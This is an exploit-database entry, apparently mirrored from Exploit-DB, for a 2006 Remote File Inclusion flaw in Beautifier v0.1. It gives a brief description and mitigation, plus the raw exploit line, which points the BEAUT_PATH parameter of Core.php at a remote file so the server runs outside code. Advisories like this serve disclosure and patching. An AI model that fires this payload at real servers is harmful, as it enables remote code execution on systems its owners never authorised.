header-logo
Suggest Exploit
vendor:
Beautifier
by:
the master
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Beautifier
Affected Version From: v0.1
Affected Version To: v0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Beautifier v0.1 Remote File Inclusion Vulnerability

Beautifier v0.1 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the BEAUT_PATH parameter of the Core.php file. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

To mitigate this vulnerability, the application should validate user input and filter out any malicious URLs. Additionally, the application should be configured to only allow access to trusted sources.
Source

Exploit-DB raw data:

########################################################################
#  Beautifier v0.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://cmd.gif?
########################################################################

# milw0rm.com [2006-09-06]

Navigation

Suggest Exploit

Services By CQR